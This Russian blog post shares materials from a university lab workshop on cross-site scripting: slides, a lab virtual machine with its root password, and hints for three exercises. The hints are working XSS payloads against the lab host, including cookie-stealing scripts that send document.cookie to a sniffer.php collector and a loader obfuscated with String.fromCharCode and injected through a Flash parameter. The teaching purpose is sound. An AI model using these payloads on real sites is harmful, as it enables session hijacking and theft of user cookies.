Материалы с мастер-класса по Cross-Site Scripting

Материалы с мастер-класса по Cross-Site Scripting
Проводил в субботу на прошедшей неделе лабораторную работу в институте МИФИ по теме "Межсайтовое выполнение сценариев" (базовый уровень). Материалы лабораторной работы представлены ниже. name='more'> PT MIFI Labxss
View more presentations from Dmitry Evteev . Презентацию в формате Microsoft Office PowerPoint можно скачать здесь . Раздаточный материал: PT MIFI Labxss
View more documents from Dmitry Evteev . Виртуальную машину, можно забрать отсюда . MD5 1cacb2332bf8247ad8b2f65cbd34cc73 *XSSLABbsd.rar Технические детали: Для запуска виртуальной машины может использоваться VMWare Player . IP-адрес системы управления - 192.168.0.50 (management). IP-адрес системы для проведения лабораторной работы 192.168.0.51 (target). Пароль на учетную запись "root" в ОС/MySQL "hackmeMif1". Примечание: действия администратора эмулировались на ОС Windows с использованием AutoIt (виртуальная машина с windows не выкладывается). Подсказки по выполнению лабораторной работы. Часть 1. http://192.168.0.51:80/ http://192.168.0.51:8085/sniffer.php?id=31337&data= http://192.168.0.51:8085/viewer.php?id=31337 <script>xss=new/**/Image().src='http://192.168.0.51:8085/sniffer.php?id=31337&data='+document.cookie;</script> Часть 2. http://192.168.0.51:81/ http://192.168.0.51:8085/act.js http://192.168.0.51:81/layer.swf?url=javascript:alert(1); javascript:document.write('<script/src=http://192.168.0.51:8085/act.js></script>') javascript:eval(String.fromCharCode()); document.write('<script/src=http://192.168.0.51:8085/act.js></script>') 192.168.0.51:81/layer.swf?user=r00t&pass=31337&server=192.168.0.51&url=javascript:eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 39, 60, 115, 99, 114, 105, 112, 116, 47, 115, 114, 99, 61, 104, 116, 116, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 48, 46, 53, 49, 58, 56, 48, 56, 53, 47, 97, 99, 116, 46, 106, 115, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62, 39, 41)); Часть 3. http://192.168.0.51:82/actions.php?s=100%3Cscript%3E http://192.168.0.51:82/actions.php?s=1;alert/*skip*/('XSS'); 192.168.0.51:82/actions.php?s=1;document.write('%3Cimg%20sr'%2b'c=http://192.168.0.51:8085/sniffer.php?id=31337%26data='%2bdocument['cookie']%2b'%3E'); http://192.168.0.51:8085/md5.php
client-side attacks уязвимости waf уязвимости web выступления Cross-Site Scripting
Alt text

Не ждите, пока хакеры вас взломают - подпишитесь на наш канал и станьте неприступной крепостью!

Подписаться